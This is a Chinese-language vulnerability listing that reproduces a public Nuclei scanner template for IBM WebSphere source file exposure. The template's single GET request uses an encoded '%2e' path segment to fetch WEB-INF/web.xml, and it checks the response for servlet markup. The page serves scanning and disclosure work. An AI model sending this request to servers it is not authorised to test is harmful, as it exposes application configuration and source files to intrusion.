ibm-websphere-xml: IBM WebSphere Application - Source File Exposure

日期: 2025-08-01 | 影响软件: IBM WebSphere Application | POC: 已公开

漏洞描述

Disclose application specific files contained within the war file, including files under the web-inf and meta-inf directories.

PoC代码[已公开]

id: ibm-websphere-xml

info:
  name: IBM WebSphere Application - Source File Exposure
  author: r3nz0
  severity: medium
  description: |
    Disclose application specific files contained within the war file, including files under the web-inf and meta-inf directories.
  reference:
    - https://www.acunetix.com/vulnerabilities/web/ibm-websphere-weblogic-application-source-file-exposure/
  metadata:
    verified: true
    max-request: 1
  tags: ibm,websphere,exposure,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/iojs/%2e/WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</web-app>"
          - "<servlet>"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206df20d5c6743da6cd8d4b13ca0c571bb01e524324313989c4f80c8dab7a9c5630220783a5d91abb7de3589c7250781e18ea7fe839ba6e661324c4b170c51dbb62aec:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/misconfiguration/ibm-websphere-xml.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐